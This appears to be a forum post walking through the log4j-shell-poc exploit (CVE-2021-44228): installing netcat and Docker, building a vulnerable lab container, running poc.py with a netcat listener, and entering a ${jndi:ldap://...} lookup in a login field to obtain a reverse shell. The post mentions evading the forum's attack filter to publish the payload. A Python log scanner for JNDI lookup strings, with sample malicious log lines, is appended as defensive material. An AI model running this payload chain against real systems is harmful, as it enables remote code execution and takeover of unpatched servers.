OP 03 June, 2022 - 05:13 PM
(This post was last modified: 03 June, 2022 - 05:29 PM by 0a7. Edited 2 times in total.)
Install Java
yum or apt install default-jre
Install netcat
yum or apt install netcat
Install Docker
yum or apt install docker
Install pip3
yum or apt install python3-pip
Install requirements
pip3 install -r requirements.txt
Install Java-sdk
Step 1 :
Step 2 :tar -xf jdk-8u20-linux-x64.tar.gz
Step 3 : put the file in the root of log4j-shell-poc-main
Install the Dockerfile to test the exploit
Step 1 : docker build -t log4j-shell-poc .
Step 2 : docker run --network host log4j-shell-poc
Step 3 : connect to http://127.0.0.1:8080
We can start the test
Step 1 : It will take 2 terminals, 1 to launch the exploit, the other for ncat
First Terminal : python3 poc.py --userip localhost --webport 8000 --lport 9001
Second Terminal : nc -lvnp 9001
Web part
Go back to your HTTP server (from Docker) (http://127.0.0.1:8080)
Login username : {jndi:ldap://localhost:1389/a} (add the $ in front of the quotes; I couldn't put it because it's considered an SQL attack and it blocks me from posting the thread)
Passwd : doesn't matter
Well done, you are finally in your reverse shell!
Explanation :
{jndi:ldap -> log4j code, log4j code -> poc.py, poc.py -> poc returns code to docker or your vulnerable site/server -> and your docker sends a reverse shell to your machine.
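On the defender's side, the lookup string typed into the login field is what ends up in application and access logs. The following is an added example, not part of the original post or of the log4j-shell-poc project: a Python scanner that finds the plain `${jndi:...}` form in log lines, including when it is percent-encoded, and extracts the callback host and port. The log lines, function names and default-port table are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Plain form of the lookup from the post: ${jndi:<scheme>://<host>[:<port>]/<path>}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/\s}]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)
# Assumed defaults, used when the lookup URL carries no explicit port
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}

def find_jndi_lookups(line):
    """Return one dict per JNDI lookup found in a single log line."""
    decoded = line
    for _ in range(2):  # access logs often keep the raw percent-encoded request
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    hits = []
    for m in JNDI_RE.finditer(decoded):
        scheme = m.group("scheme").lower()
        port = int(m.group("port")) if m.group("port") else DEFAULT_PORTS.get(scheme)
        hits.append({"scheme": scheme, "host": m.group("host"),
                     "port": port, "path": m.group("path") or ""})
    return hits

def scan(lines):
    """Return (line_number, hit) tuples for every lookup in the given lines."""
    return [(n, hit) for n, line in enumerate(lines, 1)
            for hit in find_jndi_lookups(line)]

# Constructed sample log lines (not taken from the vulnerable app)
SAMPLE_LOG = [
    "2022-06-03 17:20:01 INFO login failed for user: alice",
    "2022-06-03 17:20:09 INFO login failed for user: ${jndi:ldap://localhost:1389/a}",
    '127.0.0.1 - - [03/Jun/2022:17:20:09 +0000] "POST /login?uname='
    '%24%7Bjndi%3Aldap%3A%2F%2Flocalhost%3A1389%2Fa%7D HTTP/1.1" 200 512',
    "2022-06-03 17:21:30 INFO login failed for user: ${JNDI:LDAP://localhost/a}",
]

if __name__ == "__main__":
    for lineno, hit in scan(SAMPLE_LOG):
        print(f"line {lineno}: {hit['scheme']}://{hit['host']}:{hit['port']}{hit['path']}")
```

Each hit gives the outbound destination the server was told to contact, which can be checked against egress firewall or proxy logs for the same time window.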